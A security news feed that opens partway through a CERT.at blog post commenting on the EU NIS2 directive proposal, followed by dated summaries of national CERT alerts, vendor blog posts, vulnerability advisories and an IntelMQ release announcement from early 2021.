duty. A clarification might be helpful. Art. 10(2)(a) monitoring cyber threats, vulnerabilities and incidents at national level; Monitoring can be purely passive, where the CSIRT is just reading OSINT or check their mailboxes for incoming incident reports. Or, it could be active monitoring, going out trying to find vulnerabilities by testing, scanning or probing systems. From our experience as a national CSIRT, active scanning is an important part of the job. I'd prefer if the NIS2 would be clearer on this subject. Art. 11(3) Each Member State shall ensure that its competent authorities or CSIRTs inform its single point of contact of notifications on incidents, significant cyber threats and near misses submitted pursuant to this Directive. Just cut out the SPoC from all operational cooperation, and replace it by the CyCLONE officers. Art. 12(4)(b) exchanging best practices and information in relation to the implementation of this Directive, including in relation to cyber threats, incidents, vulnerabilities [...] I'm all for the Cooperation Group to talk about best practices, this could also be read as that the CG is the right place to talk about concrete incidents and their impact. Perhaps it should be clearer that the CG's job is not the exchange of operational information. Art. 13(1) In order to contribute to the development of confidence and trust and to promote swift and effective operational cooperation among Member States, a network of the national CSIRTs is established. We had a lot of head-ache with this language when formulating the RoP of the CSIRTs Network a few years ago. The problem is that "national CSIRT" is never defined in this document. I wrote a long blog-post about this some time ago. Just drop "national" here, we're defining the membership in the next paragraph anyway. Art. 13(2) The CSIRTs network shall be composed of representatives of the Member States’ CSIRTs and CERT–EU. As "CSIRT" is a generic term, this language is too broad. It should be made clear that we're talking about the set of CSIRTs that are introduced in Article 9(1). Additionally, why "representatives"? The CNW is a network of teams, and not just a forum where representatives of the teams can talk to each other. So perhaps use "The CSIRTs network shall be composed of the Member States’ CSIRTs which are designated according to Article 9(1) and CERT–EU." Art. 13(3)c at the request of a representative of the CSIRT network potentially affected by an incident, exchanging and discussing information in relation to that incident and associated cyber threats, risks and vulnerabilities; Isn't that already covered by (b)? Art. 13(3) (missing) The CSIRTs Network is also used to share (on a voluntary basis) tools, extensions to tools, processes and documents that members have created. It would be helpful if this would also get a bullet point in Art 13(3). Art. 14(3) (missing) The EU-CyCLONe should also take over the operational aspects of the old SPOC, i.e. the forwarding of major incident reports affecting multiple EU member states. Art. 15(1)b the technical, financial and human resources available to competent authorities and cybersecurity policies, [...] It would be helpful, if the report does not only provide that information regarding the competent authorities, but also the CSIRTs and the national CyCLONe structure. Art. 16 Peer-reviews I support the basic idea of the peer reviews. From what I know, such reviews are already standard practice in the realms of law enforcement. Two points seem to be missing from the article: Cost. Who is supposed to cover the expenses? Classification. Yes, "the reports may be published" is in 7., but I'm not sure that's a good idea as it is written. I would recommend going for a confidential report to be shared only internally (CG, CNW, EC, ENISA) and a TLP:WHITE version for public consumption. Art. 17(2) Member States shall ensure that members of the management body follow specific trainings, on a regular basis, [...] Is "follow a training" the same as "attend a training" (or is it "following the stuff learned during trainings")? While I support the idea behind this point, I'm not sure how that can be implemented and audited? Whose job is it to verify that the CEOs and others possess the relevant education? Art. 20(1) Where appropriate, those entities shall notify, without undue delay, the recipients of their services of incidents that are likely to adversely affect the provision of that service. This might be tricky, the qualifier "When appropriate" being really important to make this workable. As we're now expanding the set of organisations covered by this directive, handling the customer notifications becomes really tricky. Determining the "recipients of their services" is in many cases "whoever might walk through our door tomorrow" (think supermarkets or hospitals). There is no way those entities can do targeted notifications. So how should those cases be handled? Art. 20(2) Member States shall ensure that essential and important entities notify, without undue delay, the competent authorities or the CSIRT of any significant cyber threat that those entities identify that could have potentially resulted in a significant incident. We have a problem here. Going back to the definition contained in REGULATION (EU) 2019/881: "cyber threat" means any potential circumstance, event or action that could damage, disrupt or otherwise adversely impact network and information systems, the users of such systems and other persons; The definition is good, but it's not a good fit here, because it covers generic threats as well. Any competent CISO will always have a long list of threats to the information security of his organisation. Such a list is the basis for risk management and thus essential for steering defensive measures towards optimal results. It's not something that need to be shared to CSIRTs, competent authorities or recipients of services. What we need here is a different definition. It must be restricted to a concrete event that actually happened. The only thing that can stay in the conjunctive ("might") is the connex to an actual outage. In other words, the risk that someone might have compromised the integrity of an organisation's network is not worth being reported, but the risk that someone from whom you know is inside your networks will cause a disruption, is. Additionally, we need to make sure that not every entity will need to do a risk disclosure every time a software vendor releases a patch. (Yes, every second Tuesday each month, almost all entities learn about very concrete risks to their infrastructure. Worth reporting? No.) Art. 20 (6) [...] the competent authority or the CSIRT shall inform the other affected Member States [...] This is a step in the right direction, though I'd prefer that to be either CyCLONe officer or CSIRT. Art. 20 (6,8,9) [...] single point of contact [...] Please remove the SPOC from this operational role. As for 9.: the SPOC does not have (according to this document) the information on all NIS incident reporting, only the cross-MS relevant ones. Art. 23(1) For the purpose of contributing to the security, stability and resilience of the DNS, Member States shall ensure that TLD registries and the entities providing domain name registration services for the TLD shall collect and maintain accurate and complete domain name registration data in a dedicated database facility with due diligence subject to Union data protection law as regards data which are personal data. This is utterly misleading. Someone is pushing an agenda which has little to do with the purpose of the NIS directive. Last year I was asked by ENISA staff for my input to a report on the security of the DNS and the questions made it clear that the initiator of that study wanted ENSIA to come to the pre-ordained conclusion that incorrect domain ownership data is the most pressing security issue for the DNS. No, it is not. So here we go again. The security, stability and resilience of the DNS depends on the following players: The domain owner (registrant). If they lose the credentials for the web-interface of their registrars, then the domain can be compromised. The registrar. They act in the name of the registrant, and if they mess up, something might happen to the domain that does not conform to the wishes of the domain owner. The registry (and the nameserver operators it contracts). Making sure the correct registration data is kept and made available to recursive nameservers The recursive nameservers: run by either ISPs or corporate networks The domains of important or essential entities do not depend on whether the registration data for some other domain is correct or not. This does not mean that accurate and complete registration data would not be helpful in a broader context. Depriving malicious actors a way to register domains under fake names could have positive effects with regards to the level of fraud on the Internet and might improve the overall cyber hygiene. But the stability of the DNS itself? It just does not matter. Looking at the history of disruptions in DNS operations shows that incorrect whois data was almost never a factor. Art. 23 [...] TLD [...] In the current NIS regime, TLD registries are explicitly mentioned as operators of essential services. I agree with that classification as any disruption at that level has significant impact. But this here is different: we're aiming at the problem that someone might be using a domain without disclosing who he is. Whether that domain is directly under a TLD (e.g., example.at) or one layer down (example.co.at) is completely irrelevant. If you look at the public suffix list, there are many points in the DNS where delegations happen to other organisations. If the point of Article 23 is to prevent the access to domain names without accurate ownership tracking, then the focus on TLDs is just way to narrow. What TLD registries are covered? Should these just be the ccTLDs of EU Member states plus .eu? Or should this (similar to the GDPR) cover all registries that cater to the EU market? Is this Article supposed to cover .org and also most of the ngTLDs? It looks like it. See also Art. 24(3). Thick versus Thin registries: There are two basic approaches to keeping track of registrant data: Thick registries hold a database with registrant data, thin registries leave this job to the registrars and store only the nameserver and a registrar-ID. Is article supposed to outlaw thin registries in the EU? What does this mean for .com? Art. 23 (summary) Summary: I can see a point in making sure that domain registration data is correct. But the way this topic is approached here is not thought through and there is a lot to say that the NIS directive is probably the wrong instrument. Art. 26 Cybersecurity information-sharing arrangements This looks fine. Art. 27 Voluntary notification of relevant information This should be a bit more generic. This article needs also to cover: non-covered entities reporting incidents and vulnerabilities / risks on their side anybody reporting incidents / vulnerabilities / risks detected anywhere else. Why is that important? We used to get a data-feed from Google covering issues with web-pages their crawler detected in the Austrian Internet. They stopped providing this, claiming problems with the GDPR. It would be really helpful if security researchers have a clear green light to report their findings to the national CSIRTs. This blog post is part of a series of blog posts related to our CEF Telecom 2018-AT-IA-0111 project, which also supports our participation in the CSIRTs Network.

https://www.cert.at/en/blog/2021/3/nis2-proposal-first-feedback-on-the-normative-text
We issued a red alert: Critical vulnerability in Exchange email server targeted by active exploitation
2021-03-10T09:50:50Z | 1615369850

The red alert was issued as the situation calls for immediate measures. The alert concerns vulnerabilities in Exchange servers, which are being actively exploited.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/Varoitus_TTN_0121
We issued a red alert: Critical vulnerability in Exchange email server targeted by active exploitation
2021-03-10T09:50:50Z | 1615369850

The red alert was issued as the situation calls for immediate measures. The alert concerns vulnerabilities in Exchange servers, which are being actively exploited.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/Varoitus_TTN_0121
Lateral movement — what you need to know (part one)
2021-03-10T09:47:47Z | 1615369667

Finland is part of global information networks. As a result, Finland and Finns are targeted by data breaches that use the techniques of lateral movement to obtain increased privileges and create favourable conditions for the attacker. This Information Security Now! article, which deals with the phenomenon in broad terms, is the inaugural entry in our series on lateral movement. The full article is available in Finnish.

https://www.kyberturvallisuuskeskus.fi/en/news/lateral-movement-what-you-need-know-part-one
Lateral movement — what you need to know (part one)
2021-03-10T09:47:47Z | 1615369667

Finland is part of global information networks. As a result, Finland and Finns are targeted by data breaches that use the techniques of lateral movement to obtain increased privileges and create favourable conditions for the attacker. This Information Security Now! article, which deals with the phenomenon in broad terms, is the inaugural entry in our series on lateral movement. The full article is available in Finnish.

https://www.kyberturvallisuuskeskus.fi/en/news/lateral-movement-what-you-need-know-part-one
Galileo Innovation Challenge spurs new innovations
2021-03-10T09:46:13Z | 1615369573

In 2019, the Galileo Innovation Challenge gathered dozens of participants from around the world in Helsinki. We called three teams that took part in the event and asked them about their current activities.

https://www.kyberturvallisuuskeskus.fi/en/news/galileo-innovation-challenge-spurs-new-innovations
Galileo Innovation Challenge spurs new innovations
2021-03-10T09:46:13Z | 1615369573

In 2019, the Galileo Innovation Challenge gathered dozens of participants from around the world in Helsinki. We called three teams that took part in the event and asked them about their current activities.

https://www.kyberturvallisuuskeskus.fi/en/news/galileo-innovation-challenge-spurs-new-innovations
Insights into HTTPS-Only Mode
2021-03-10T09:40:30Z | 1615369230

In a recent academic publication titled HTTPS-Only: Upgrading all connections to https in Web Browsers (to appear at MadWeb – Measurements, Attacks, and Defenses for the Web) we present … Read more

https://blog.mozilla.org/attack-and-defense/2021/03/10/insights-into-https-only-mode/
Now Launching - SOTI: Research
2021-03-10T05:00:00Z | 1615352400

https://www.akamai.com/blog/security/now-launching-soti-research
EdgeKV: Serverless Storage at the Edge
2021-03-10T05:00:00Z | 1615352400

We are pleased to announce the launch of EdgeKV, our distributed key-value store, into beta! EdgeKV is enabling technology for EdgeWorkers, our serverless computing platform that enables developers to create services using JavaScript and deploy them across our platform. When writing JavaScript, data persistence is often necessary to save data from a user interaction, or to retrieve contextual data to evaluate inside a function.

https://www.akamai.com/blog/edge/serverless-storage-at-the-edge-edgekv-beta
High Threat Security Alert (A21-03-05): Multiple Vulnerabilities in Microsoft Products (March 2021)
2021-03-10T04:00:00Z | 1615348800

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
3MF Consortium lib3mf NMR::COpcPackageReader::releaseZIP() use-after-free vulnerability
2021-03-10T00:00:00Z | 1615334400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1226
3MF Consortium lib3mf NMR::COpcPackageReader::releaseZIP() use-after-free vulnerability
2021-03-10T00:00:00Z | 1615334400

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1226
The Digital Transformation Playbook: Practical Strategies for Addressing the 4 Use Cases of Digital Transformation
2021-03-09T11:20:11Z | 1615288811

The post The Digital Transformation Playbook: Practical Strategies for Addressing the 4 Use Cases of Digital Transformation appeared first on Cato Networks.

https://www.catonetworks.com/resources/the-digital-transformation-playbook-practical-strategies-for-addressing-the-4-use-cases-of-digital-transformation/
Sensor Architecture Can Help Keep Us Up and Running: Part 2
2021-03-09T05:00:00Z | 1615266000

Previously, I introduced the field of sensor systems architecture and posed a real world example scenario of the unnecessary resource costs and hazards that can happen when the deployment of sensors isn't carefully thought out.

https://www.akamai.com/blog/security/sensor-architecture-can-help-keep-us-up-and-running-part-2
Finding the Best Servers to Answer Queries ? Edge DNS and Anycast
2021-03-09T05:00:00Z | 1615266000

While Unicast defines a single destination endpoint for a given IP, Anycast is an addressing technique in which the same IP is advertised from multiple servers simultaneously.

https://www.akamai.com/blog/edge/finding-the-best-servers-to-answer-queries-edge-dns-and-anycast
CVE-2021-22714
2021-03-09T00:00:00Z | 1615248000

CWE-119 Improper Restriction of Operations Within a Memory BufferA critical integer overflow vulnerability that could enable an attacker to send a specially crafted TCP packet to the device to either cause it to reboot the meter or remotely run code of their choice, depending on the architecture of the targeted device.Read more: Claroty Uncovers Vulnerabilities in Schneider Electric Smart Meters

https://claroty.com/team82/disclosure-dashboard/cve-2021-22714
CVE-2021-22713
2021-03-09T00:00:00Z | 1615248000

CWE-119 Improper Restriction of Operations Within a Memory Buffer A critical integer overflow vulnerability that could enable an attacker to send a specially crafted TCP packet to the device to cause it to reboot the meter.Read more: Claroty Uncovers Vulnerabilities in Schneider Electric Smart Meters

https://claroty.com/team82/disclosure-dashboard/cve-2021-22713
New Microsoft Exchange Vulnerability Disclosed
2021-03-08T21:52:33Z | 1615240353

Several new CVEs targeting MS Exchange servers have been discovered and shared by Microsoft. Attacks using these CVEs include manipulation of domain admin accounts, deployment of a web shell and exfiltration of data. Cato Networks security team has already developed and deployed the proper defenses for this new threat. Earlier this week Microsoft disclosed a... The post New Microsoft Exchange Vulnerability Disclosed appeared first on Cato Networks.

https://www.catonetworks.com/blog/new-microsoft-exchange-vulnerability-disclosed/
Critical vulnerability in Exchange email server targeted by active exploitation
2021-03-08T12:10:11Z | 1615205411

Exchange email server has a critical vulnerability that has been actively exploited. Software updates are available and should be installed immediately. In addition, system administrators should examine the systems for signs of data breaches. he National Cyber Security Centre Finland (NCSC-FI) is aware of several dozens of data breach incidents. We updated the alert from red to yellow on 23 March and discontinued it on 15 April 2021.

https://www.kyberturvallisuuskeskus.fi/en/varoitus-exchangen-hyvaksikaytetty-haavoittuvuus
Information security in 2021: 3 threats and 3 solutions for everyone
2021-03-08T07:26:14Z | 1615188374

Regular internet users are threatened by scam traps that online criminals set before us every day. But not all of these traps lurk in the depths of the internet, as online scammers can also reach out to users by phone. Meanwhile, organisations are threatened by flimsy remote working solutions, malware and phishing. Here are the TOP 3 information security threats and solutions relevant to everyday life and workplaces in 2021.

https://www.kyberturvallisuuskeskus.fi/en/news/information-security-2021-3-threats-and-3-solutions-everyone
Information security in 2021: 3 threats and 3 solutions for everyone
2021-03-08T07:26:14Z | 1615188374

Regular internet users are threatened by scam traps that online criminals set before us every day. But not all of these traps lurk in the depths of the internet, as online scammers can also reach out to users by phone. Meanwhile, organisations are threatened by flimsy remote working solutions, malware and phishing. Here are the TOP 3 information security threats and solutions relevant to everyday life and workplaces in 2021.

https://www.kyberturvallisuuskeskus.fi/en/news/information-security-2021-3-threats-and-3-solutions-everyone
Is MFA a Security Illusion?
2021-03-08T05:00:00Z | 1615179600

A recent Akamai Security blog post, Massive Campaign Targeting UK Banks Bypassing 2FA, written by my colleague Or Katz, is a great insight into how attackers used very simple techniques to bypass two-factor (2FA) authentication security to obtain access to U.K. consumers' bank accounts.

https://www.akamai.com/blog/security/is-mfa-a-security-illusion
Akamai Startup Program: Fostering Innovation
2021-03-08T05:00:00Z | 1615179600

Akamai, the intelligent edge platform for securing and delivering digital experiences, continues to focus on innovation by launching Cohort 2 of the Akamai Startup program.

https://www.akamai.com/blog/news/akamai-startup-program-fostering-innovation
Socialarks alvo de leak de dados que resulta na exposição de mais de 200 milhões de utilizadores. Saiba como se proteger de situações como esta.
2021-03-08T00:00:00Z | 1615161600

A base de dados da empresa (ElasticSearch) encontrava-se desprotegido e continha informações pessoais que foram expostas após o ataque. Estamos a falar de endereços de IP, números de telefone, endereços de e-mail e nome completo de pelo menos 214 milhões de utilizadores destas redes sociais. Desta forma, a falha de segurança no servidor da empresa significava que qualquer pessoa que tivesse na sua posse o endereço IP do servidor poderia aceder ao banco de dados que continha informações pessoais de milhões de pessoas. O que deve fazer se for utilizador destas redes sociais:• Desconfie de chamadas de números desconhecidos;• Não abra links ou anexos enviados de números ou e-mails desconhecidos;• Tenha atenção ao verificar se o remetente do email é conhecido ou se é apenas parecido, por exemplo, joaosousa@gov.pt não é igual a j0aosousa@gov.pt, nem a joaosousa@gov.tt;• Desconfie das mensagens instantâneas de desconhecidos;• Não utilize informação pessoal para construir palavras chave, por exemplo, data de nascimento ou número de telefone;   Se é responsável por sistemas de informação, atente a algumas recomendações relativas aos sistemas:• Os sistemas não devem estar publicamente disponíveis, exceto quando estritamente necessário;• Deverão estar sempre protegidos com autenticação;• Quando possível utilizar autenticação multi-factor;• Deverá aplicar atualizações de segurança periodicamente. Caso tenha conhecimento ou seja alvo de uma situação como a acima mencionada reporte. Para isso, basta aceder ao o site ou via email através do endereço cert@cert.pt .

https://dyn.cncs.gov.pt/pt/detalhe/art/135532/socialarks-alvo-de-leak-de-dados-que-resulta-na-exposicao-de-mais-de-200-milhoes-de-utilizadores-saiba-como-se-proteger-de-situacoes-como-esta
The Biggest Misconception About Zero-Day Attacks
2021-03-07T15:03:41Z | 1615129421

While security researchers constantly try to identify and report zero-day vulnerabilities, if those vulnerabilities are not patched and if security controls are not updated, the threat remains real. Cato Networks MDR team investigated patching adoption rates and how to mitigate the risk of vulnerable systems in your network. Not every software is vulnerable, not every... The post The Biggest Misconception About Zero-Day Attacks appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-biggest-misconception-about-zero-day-attacks/
SASE as a Gradual Deployment
2021-03-07T11:03:20Z | 1615115000

The post SASE as a Gradual Deployment appeared first on Cato Networks.

https://www.catonetworks.com/resources/sase-as-a-gradual-deployment/
Vaktsineerimise info saamiseks tuleb oma eesti.ee postkasti suunata
2021-03-05T16:02:43Z | 1614960163

Alates eilsest edastab haigekassa 60–69-aastastele inimestele vaktsineerimise infot riikliku postkasti (@eesti.ee) kaudu. Info kättesaamiseks tuleb riigiportaalis www.eesti.ee asuv postkast enda isiklikule meiliaadressile edasi suunata.

https://ria.ee/uudised/vaktsineerimise-info-saamiseks-tuleb-oma-eestiee-postkasti-suunata
SonicWall SSO-Agent NetAPI Vulnerability allows an attacker to force SSO Agent authentication, potentially leading to firewall access control bypass
2021-03-04T23:48:30Z | 1614901710

SonicWall SSO-agent default configuration uses Microsoft NetAPI to probe the associated IP's in the network, this client probing method allows a potential attacker to capture the password hash of the privileged user and potentially forces the SSO Agent to authenticate allowing an attacker to bypass firewall access controls.SonicWall SSO agent is ONLY affected if NetAPI is selected as a client probing method. This is a Microsoft NetAPI vulnerability and NetWkstaUserEnum request that it uses. CVE: CVE-2020-5148 Last updated: March 4, 2021, 11:48 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0003
IntelMQ 2.3.0 with IntelMQ API, Docker, Shadowserver Reports API support, new documentation home and more
2021-03-04T14:21:14Z | 1614867674

Today we released the newest IntelMQ version 2.3.0 along with its companion tools - the IntelMQ Manager and the new IntelMQ API. This version comes with significant changes, being an important intermediate step for the 3.0 release scheduled for summer 2021. We moved the documentation to a new home, see our previous blog post "IntelMQ offers tutorial lessons and a new documentation page". The new documentation page also integrates the documentation for the Manager and API, ending the times of distributed documentation. It further features overviews of the integration possibilities with n6 and MISP. Using a combination of Vagrant and Ansible, end-to-end tests enhance our quality management, which now consists of extensive unit-tests, packaging tests, spelling & styling check and as well as security analyses. Numerous "bots" (IntelMQ's plug-able components) have been added or gained new significant features: CZ.nic HAAS and PROKI Parsers, by Filip Pokorný and Edvard Rejthar (CSIRT.CZ) ESET Collector and Parser, by Mikk Margus Möll (CERT.EE) Kafka Collector, by Birger Schacht (CERT.at) Key-Value Parser, by Karl-Johan Karlsson (Linköping University) Request Tracker Output, by Marius Urkis (NRDCS.LT) Shadowserver Reports API and JSON Parser, by Birger Schacht (CERT.at) Splunk Saved Search Expert, by Karl-Johan Karlsson (Linköping University) Threshold Expert, by Karl-Johan Karlsson (Linköping University) Shadowserver CSV & JSON Parser: Support for the feeds MSRDPUDP, Vulnerable-HTTP, Sinkhole DNS and fixes for existing feed mappings, by Sebastian Waldbauer and Sebastian Wagner (CERT.at) HTTP collector: PGP signature check functionality, by sinus-x Several Experts (1, 2, 3, 4): Integrated local database update mechanisms, by Filip Pokorný (CSIRT.CZ) All new changes can be read in the change log. If you are upgrading, please also have a look at the news file. If you get started, have a look at our documentation which contains an introduction and detailed information on the installation. The new IntelMQ API and overhauled IntelMQ Manager back-end Version 2.3.0 comes with a new API, a feature which has often been requested for IntelMQ. The API actually originates from the IntelMQ Manager: Thanks to SUNET-funding, the contributing company Intevation rewrote the back-end of the IntelMQ Manager in Python. Python is the main language used in the IntelMQ projects, but until the rewrite PHP was used for the backend. As part of the revamp, the URLs have been changed to better match those of a proper programming interface. Additionally, Intevation added optional authentication directly into the API. CERT.at then further split the IntelMQ Manager's back-end off into the IntelMQ API. Therefore it's now possible to run the Manager and the API on different hosts. Docker IntelMQ 2.3.0 is the first release with an official Docker image available at Dockerhub under certat/intelmq-full. Using Docker is the simplest way of getting started with IntelMQ as of now. But as it is brand-new, we consider it as beta currently. The container consists of IntelMQ with all optional dependencies, including the Manager and the API, whereas Redis and nginx are ran in separate containers.Some configuration variables are passed to the containers using environment variables. This functionality is new in IntelMQ as well, but not yet available for all configuration settings. IntelMQ 3.0 will be able to use arbitrary parameters from the environment. The installation instructions contain details about the set-up process. Shadowserver Reports API Shadowserver is an internationally active and altruistic organisation scanning the Internet for vulnerable devices every day and sinkholing various botnets. They provide the data free-of-charge to CERTs worldwide which are able to act upon the Threat Intelligence data. The vast amount of data is split into different report types, whereas one report by report type is provided per day. A report only contains the data which is relevant for the recipient. The traditional data transmission manner are e-mails with CSV data files, either directly as attachment or - if very big - linked for download via HTTPS. Since October 2020, Shadowserver also provides an HTTP API. IntelMQ supports this API as data collection since this version and allows all IntelMQ users (with an active Shadowserver cooperation) to get Shadowservers's reports directly and without detours into the processing pipeline. Aligned with IntelMQ's concept of separating data collection and parsing, IntelMQ has two separate components for the Shadowserver Reports API support: The Shadowserver Reports API Collector needs to be configured with the API credentials, the relative time-frame and optionally a list of report types. If no list of report types is given, all available reports are downloaded. The collector keeps track which reports have already been downloaded, so the collector can be executed frequently without downloading data multiple times. The format of the downloaded data is JSON, as opposed to the data provided via e-mail, which is CSV. The Shadowserver JSON Parser uses the same field-mappings as CSV. But as opposed to the Shadowserver CSV parser, which maps the columns of CSV-files to IntelMQ's internal fields, the JSON parser does the same for JSON dictionaries. Both Shadowserver parsers are able to detect the report type based on the file name, which was recorded by the collector in the first place. Shadowserver is actively looking for sponsors to keep up the great value they provide to the IT security community. Please consider becoming a sponsor. This blog post is part of a series of blog posts related to our CEF Telecom 2018-AT-IA-0111 project, which also supports our participation in the CSIRTs Network.

https://www.cert.at/en/blog/2021/3/intelmq-230-api-docker-shadowserver-reports-api-documentation
2020 was a tumultuous year during which cyber security was on everyone’s lips
2021-03-04T12:19:05Z | 1614860345

What was 2020 like in the context of information security? The Vastaamo data breach, the pandemic and remote work, the Koronavilkku application, the Emotet malware strain and technical support scam calls made for a tumultuous year. The information security of 5G and the needs for change regarding its security regulation also garnered a great deal of discussion. Review the key events of the year and discover the necessary steps for better cybersecurity in 2021 by checking out our report.

https://www.kyberturvallisuuskeskus.fi/en/news/2020-was-tumultuous-year-during-which-cyber-security-was-everyones-lips
2020 was a tumultuous year during which cyber security was on everyone’s lips
2021-03-04T12:19:05Z | 1614860345

What was 2020 like in the context of information security? The Vastaamo data breach, the pandemic and remote work, the Koronavilkku application, the Emotet malware strain and technical support scam calls made for a tumultuous year. The information security of 5G and the needs for change regarding its security regulation also garnered a great deal of discussion. Review the key events of the year and discover the necessary steps for better cybersecurity in 2021 by checking out our report.

https://www.kyberturvallisuuskeskus.fi/en/news/2020-was-tumultuous-year-during-which-cyber-security-was-everyones-lips
Criminals phishing for online banking credentials via search results
2021-03-04T12:06:40Z | 1614859600

Criminals phishing for Finnish online banking credentials have managed to transfer large sums from victims’ bank accounts. How is this possible with online banks having so many security measures in place? In addition to relying on banks’ own security measures, customers should also exercise due caution when using online services.

https://www.kyberturvallisuuskeskus.fi/en/news/criminals-phishing-online-banking-credentials-search-results
Criminals phishing for online banking credentials via search results
2021-03-04T12:06:40Z | 1614859600

Criminals phishing for Finnish online banking credentials have managed to transfer large sums from victims’ bank accounts. How is this possible with online banks having so many security measures in place? In addition to relying on banks’ own security measures, customers should also exercise due caution when using online services.

https://www.kyberturvallisuuskeskus.fi/en/news/criminals-phishing-online-banking-credentials-search-results
Managing vulnerabilities with SBOM
2021-03-04T12:01:32Z | 1614859292

In the world of IoT and automation, managing vulnerabilities is exceptionally challenging – and critical. The details of and responsibilities associated with software property can easily get lost in the complexity of it all. Because of this, National Cyber Security Centre Finland recommends the adoption of a Software Bill of Materials (SBOM) to all software owners. An SBOM helps organisations identify the vulnerabilities in their own software and patch them on time.

https://www.kyberturvallisuuskeskus.fi/en/news/managing-vulnerabilities-sbom
Managing vulnerabilities with SBOM
2021-03-04T12:01:32Z | 1614859292

In the world of IoT and automation, managing vulnerabilities is exceptionally challenging – and critical. The details of and responsibilities associated with software property can easily get lost in the complexity of it all. Because of this, National Cyber Security Centre Finland recommends the adoption of a Software Bill of Materials (SBOM) to all software owners. An SBOM helps organisations identify the vulnerabilities in their own software and patch them on time.

https://www.kyberturvallisuuskeskus.fi/en/news/managing-vulnerabilities-sbom
Margus Noormaa: tuleviku kriisijuhtimist toetavad hästi toimivad digilahendused
2021-03-04T08:36:54Z | 1614847014

Valitsust on võtnud viirusega hakkamasaamise osas kritiseerida kõik, kellel vähegi sulg peos seisab. Kas tehtu hindamiseks on põhjust selliseks kriitikaks või peaksime vaatama kriisile objektiivsemalt otsa?

https://ria.ee/uudised/margus-noormaa-tuleviku-kriisijuhtimist-toetavad-hasti-toimivad-digilahendused
January Cyber Weather marked by glimpses of light in terms of malware, network performance and automation
2021-03-04T08:10:33Z | 1614845433

In January, the cyber weather was brightened up by the seizing of the Emotet botnet. However, the skies were also darkened by phishing based on search engine results taking users to criminal phishing sites instead of their online banks.

https://www.kyberturvallisuuskeskus.fi/en/kybersaa-tammikuu-2021
January Cyber Weather marked by glimpses of light in terms of malware, network performance and automation
2021-03-04T08:10:33Z | 1614845433

In January, the cyber weather was brightened up by the seizing of the Emotet botnet. However, the skies were also darkened by phishing based on search engine results taking users to criminal phishing sites instead of their online banks.

https://www.kyberturvallisuuskeskus.fi/en/kybersaa-tammikuu-2021
Sensor Architecture Can Help Keep Us Up and Running: Part 1
2021-03-04T05:00:00Z | 1614834000

In the constant press of rolling out ever better products and services to our customers, it can be easy-- and often necessary-- to fall into a reactive mode around reliability.

https://www.akamai.com/blog/security/sensor-architecture-can-help-keep-us-up-and-running-part-1
Don’t Renew Your SD-WAN Before Watching This Video
2021-03-03T12:47:00Z | 1614775620

The post Don’t Renew Your SD-WAN Before Watching This Video appeared first on Cato Networks.

https://www.catonetworks.com/resources/dont-renew-your-sd-wan-before-watching-this-video/
Akamai Identified as a Leader in DDoS Mitigation by Forrester
2021-03-03T05:00:00Z | 1614747600

This week, Akamai was again recognized as a Leader in the latest The Forrester Wave?: DDoS Mitigation Solutions, Q1 2021.

https://www.akamai.com/blog/security/akamai-identified-as-a-leader-in-ddos-mitigation-by-forrester
Compromised enterprise devices detection based on abnormal behavior patterns-- UEBA in action
2021-03-03T05:00:00Z | 1614747600

Recently, many reports of incidents have been making headlines, proving that no business or industry is immune to advanced threat actors. Applying user and entity behavior analytics (UEBA) for the challenging task of the detection of compromised devices over time can play a critical role in enterprises' defense mechanisms.

https://www.akamai.com/blog/edge/compromised-enterprise-devices-detection-based-on-abnormal-behavior-patterns-ueba-in-action
High Threat Security Alert (A21-03-01): Multiple Vulnerabilities in Microsoft Exchange Server
2021-03-03T04:00:00Z | 1614744000

Microsoft has released an out-of-band security updates addressing multiple vulnerabilities in Microsoft Exchange Server.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A21-03-02): Multiple Vulnerabilities in Google Chrome
2021-03-03T04:00:00Z | 1614744000

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-03-03): Multiple Vulnerabilities in Apache Tomcat
2021-03-03T04:00:00Z | 1614744000

Apache Software Foundation has released a security advisory to address multiple vulnerabilities in the Apache Tomcat.

https://www.govcert.gov.hk/en/alerts_detail.php
Riigikontroll: Riigi Infosüsteemi Amet on taganud X-tee töökindluse, kuid X-teed kasutavate eraettevõtete turvalisust ei kontrolli keegi
2021-03-02T07:35:51Z | 1614670551

Riigi Infosüsteemi Amet (RIA) on üldiselt taganud X-tee keskuse töökindluse, kuid X-teed kasutavate eraettevõtete infoturbe taset X-teega liitumisel ja kasutamisel ei kontrollita, tuvastas Riigikontroll oma täna avaldatud auditiaruandes „X-tee haldus ja töökindlus“.

https://ria.ee/uudised/riigikontroll-riigi-infosusteemi-amet-taganud-x-tee-tookindluse-kuid-x-teed-kasutavate
Accusoft ImageGear JPG format SOF marker processing out-of-bounds write vulnerability
2021-03-02T00:00:00Z | 1614643200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1248
Better, or More Effective?
2021-03-01T05:00:00Z | 1614574800

A colleague asked me to share my thoughts on building a "better team". I confess, I stumbled on the word "better". Better than what exactly?

https://www.akamai.com/blog/security/better-or-more-effective
Remote Access Solutions Have Evolved in Stages During the Pandemic: Ten Criteria for a Long-term Solution
2021-02-28T15:25:21Z | 1614525921

When pandemic lockdowns kicked in country by country and hundreds of millions of people were suddenly told to work from home, the world’s largest experiment in remote work got underway. Companies have gone through several stages of coping with this massive work from home (WFH) undertaking. From utter chaos at the start of WFH, to... The post Remote Access Solutions Have Evolved in Stages During the Pandemic: Ten Criteria for a Long-term Solution appeared first on Cato Networks.

https://www.catonetworks.com/blog/remote-access-solutions-have-evolved-in-stages-during-the-pandemic-ten-criteria-for-a-long-term-solution/
Putting AIOps with SASE to Use
2021-02-28T14:54:35Z | 1614524075

Note: This is the second post following AIOps and SASE – A Match Made in the Cloud. The introduction of SASE to the market is enabling enterprises to realize the potential of AIOps, bringing IT operations to a whole new level. Let’s recall the three qualities of AIOps Gartner defined: observe (gathering and monitoring data);... The post Putting AIOps with SASE to Use appeared first on Cato Networks.

